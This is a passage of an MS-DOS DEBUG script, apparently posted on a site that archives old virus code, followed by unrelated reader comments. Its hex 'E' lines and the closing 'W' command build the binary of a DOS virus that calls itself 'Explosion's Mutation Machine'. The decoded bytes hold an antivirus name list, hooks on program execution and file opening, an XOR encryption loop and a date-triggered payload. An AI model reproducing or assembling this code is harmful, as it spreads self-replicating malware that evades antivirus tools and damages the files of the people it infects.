E 0EF0 FE B9 18 00 BA 76 10 E8 5E FE 72 1D 81 06 96 10
E 0F00 06 13 83 16 98 10 00 BA 19 00 E8 BD F4 0B D2 74
E 0F10 08 BB 92 10 E8 1F FE 89 07 8B 16 96 10 8B 0E 98
E 0F20 10 E8 46 FE 33 C9 E8 2F FE B8 01 57 8B 0E 92 10
E 0F30 8B 16 94 10 E8 3F FE C3 26 81 2F 06 13 26 83 5F
E 0F40 02 00 73 0A 26 81 07 06 13 26 83 57 02 00 C3 03
E 0F50 43 4F 4D 03 45 58 45 04 53 43 41 4E 07 56 53 48
E 0F60 49 45 4C 44 05 43 4C 45 41 4E 08 46 49 4E 44 56
E 0F70 49 52 55 05 47 55 41 52 44 08 56 49 56 45 52 49
E 0F80 46 59 02 54 42 02 2D 56 07 56 49 52 53 54 4F 50
E 0F90 03 4E 4F 44 04 48 49 45 57 05 50 41 53 43 41 07
E 0FA0 4E 45 54 45 4E 56 49 06 46 2D 50 52 4F 54 06 43
E 0FB0 48 4B 44 53 4B 53 51 56 57 1E 06 50 8B F2 8B DE
E 0FC0 33 FF B9 40 00 AC 3C 5C 74 08 3C 2F 74 04 3C 3A
E 0FD0 75 02 8B DE 3C 2E 75 02 8B FE 0A C0 74 04 E2 E5
E 0FE0 EB 45 3B FB 76 41 8B F7 BF BF 0B 0E 07 E8 3A 00
E 0FF0 74 05 E8 35 00 75 30 B1 0F 8B F3 BF C7 0B 51 E8
E 1000 28 00 59 74 0B E2 F7 F8 58 07 1F 5F 5E 59 5B C3
E 1010 83 F9 02 77 0D 58 50 80 FC 4B 75 06 2E C6 06 0A
E 1020 0D 6C 83 F9 01 74 E0 F9 EB DE 56 26 8A 0D 47 8B
E 1030 C7 03 C1 50 AC 3C 61 72 06 3C 7A 77 02 2C 20 AE
E 1040 E1 F2 5F 5E C3 50 53 51 56 57 55 1E 06 E8 75 01
E 1050 E8 B9 FC B8 00 43 E8 22 FD 2E 89 0E F7 0C B8 01
E 1060 43 33 C9 E8 15 FD 72 24 B8 02 3D E8 0D FD 72 13
E 1070 52 1E 0E 1F 0E 07 A3 74 10 E8 07 FD B4 3E E8 F5
E 1080 FC 1F 5A B8 01 43 B9 00 00 E8 EF FC E8 9B FC 07
E 1090 1F 5D 5F 5E 59 5B 58 C3 FB EB 00 80 FC 11 74 05
E 10A0 80 FC 12 75 2C 53 06 50 B4 2F E8 CE FC 58 E8 CA
E 10B0 FC 3C FF 74 19 50 26 80 3F FF 75 03 83 C3 07 83
E 10C0 C3 17 E8 71 FC 58 73 06 83 C3 06 E8 6A FE 07 5B
E 10D0 CF 80 FC 4E 74 05 80 FC 4F 75 2C 53 06 50 B4 2F
E 10E0 E8 98 FC 58 E8 94 FC 72 11 50 83 C3 16 E8 46 FC
E 10F0 58 73 06 83 C3 04 E8 3F FE F8 07 5B 50 55 8B EC
E 1100 9F 88 66 08 5D 58 CF 80 FC 31 74 0B 80 FC 4C 75
E 1110 09 2E C6 06 0A 0D 00 E8 AB 00 FC 52 3D 00 4B 74
E 1120 47 3D 00 6C 75 07 F6 C2 12 8B D6 75 45 80 FC 3C
E 1130 74 40 80 FC 5B 74 3B 80 FC 3E 75 25 2E 3B 1E 9A
E 1140 10 75 1E 0B DB 74 1A 2E C7 06 9A 10 00 00 E8 2A
E 1150 FC 72 0B 1E 0E 1F BA 9C 10 E8 E9 FE 1F F8 5A EB
E 1160 9B 5A FA 2E FF 2E 4A 10 E8 4A FE 72 F4 E8 D5 FE
E 1170 EB EF 2E 83 3E 9A 10 00 75 E7 E8 38 FE 72 E2 2E
E 1180 89 16 FA 0D 5A 52 E8 F2 FB BA 00 00 72 D0 51 56
E 1190 57 06 8B F2 BF 9A 10 0E 07 AB B9 40 00 F3 A4 07
E 11A0 5F 5E 59 EB B8 54 42 4D 45 4D 58 58 58 54 42 43
E 11B0 48 4B 58 58 58 54 42 44 53 4B 58 58 58 54 42 46
E 11C0 49 4C 58 58 58 50 52 1E B4 FF 32 DB CD 13 B4 FE
E 11D0 CD 13 B8 02 FA BA 45 59 B3 31 CD 16 0E 1F B4 52
E 11E0 CD 21 26 C4 5F 22 BE 0D 0E B9 04 00 51 83 C6 08
E 11F0 8D 7F 0A B9 04 00 56 F3 A7 5E 59 E0 EF 75 06 26
E 1200 80 0E 16 00 01 26 C4 1F 83 FB FF 75 D9 1F 5A 58
E 1210 C3 43 4F 4D 4D 41 4E 44 00 B8 00 00 B1 04 D3 E8
E 1220 8C CA 03 C2 50 B8 9A 0E 50 CB FC 0E 1F B8 0F 00
E 1230 2B 06 0F 00 49 F6 F1 D1 E0 03 E0 B1 19 A1 F5 0F
E 1240 F6 F1 0A E4 75 1D B4 2A CD 21 80 FA 07 75 14 B4
E 1250 09 BA F7 0F CD 21 BA CC 03 EC 24 FD B2 C2 EE B4
E 1260 4C CD 21 E8 5F FF B4 62 CD 21 53 33 C0 8E D8 8E
E 1270 1E FE 04 81 3E 81 0E 43 4F 74 3D 93 48 8E D8 03
E 1280 06 03 00 2D 44 01 8C CA 81 C2 04 01 3B C2 72 1B
E 1290 8C CA 2E 03 16 1B 00 3B C2 72 10 8C D2 8B F4 46
E 12A0 B1 04 D3 EE 46 03 D6 3B C2 73 24 B4 48 BB FF FF
E 12B0 CD 21 81 FB 45 01 73 03 E9 9A 00 B4 48 CD 21 48
E 12C0 8E D8 C7 06 01 00 00 00 03 06 03 00 2D 44 01 8A
E 12D0 16 00 00 C6 06 00 00 4D 81 2E 03 00 45 01 A3 12
E 12E0 00 8E D8 88 16 00 00 40 A3 01 00 C7 06 03 00 44
E 12F0 01 1E 07 0E 1F FF 06 F5 0F BE 81 0E BF 08 00 A5
E 1300 A5 A5 A5 8E C0 33 F6 8B FE B9 3A 10 F3 A4 BE 42
E 1310 09 B9 3A 00 F3 A4 33 C0 26 A3 9A 10 8E D8 A1 6C
E 1320 04 26 A3 43 00 A1 6E 04 26 A3 40 00 C6 06 FB 04
E 1330 EA C7 06 FC 04 08 0D 8C 06 FE 04 FA A1 84 00 26
E 1340 A3 4A 10 A1 86 00 26 A3 4C 10 C7 06 84 00 FB 04
E 1350 8C 1E 86 00 FB 5B 0E 1F 8E C3 BE 11 00 80 7C 12
E 1360 00 75 0D BF 00 01 89 7C 14 89 5C 16 A4 A5 EB 0C
E 1370 8C C8 2B 04 01 44 16 03 44 0E 8E D0 8E DB 33 C0
E 1380 2E FF 2E 25 00 E2 04 0D 0A 57 65 6C 63 6F 6D 65
E 1390 20 74 6F 20 74 68 65 20 45 78 70 6C 6F 73 69 6F
E 13A0 6E 27 73 20 4D 75 74 61 74 69 6F 6E 20 4D 61 63
E 13B0 68 69 6E 65 20 21 0D 0A 44 69 73 20 69 73 20 6C
E 13C0 65 76 65 6C 20 33 2E 0D 0A 24 B9 3A 10 33 D2 E8
E 13D0 16 00 B4 40 8B 1E 74 10 9C 9A 00 00 00 00 72 02
E 13E0 3B C1 9C E8 02 00 9D C3 51 8B F2 B8 34 12 B9 1D
E 13F0 08 31 04 05 34 12 46 31 04 05 34 12 46 E2 F2 59
E 1400 C3 B0 03 CF
R CX
1304
W
Q

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
10 Nov 2024
الاسم : جابر حسين الناصح - السن :٤٢سنه - الموقف من التجنيد : ادي الخدمه - خبره عشرين سنه منهم عشر سنوات في كبرى الشركات بالسعوديه وعشر سنوات ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
2 Nov 2024
In Sardinia, there is a legend known as the Legend of Tirrenide. Thousands of years ago, there was a continent called Tirrenide. It was a l ...

guest's profile picture
@guest
2 Nov 2024
What is certain is that the first Greek geographer to clearly place the Pillars of Hercules at Gibraltar was Eratosthenes (who lived between ...

guest's profile picture
@guest
1 Nov 2024
Disquieting thc drinks has been quite the journey. As someone keen on unpretentious remedies, delving into the in every respect of hemp has ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT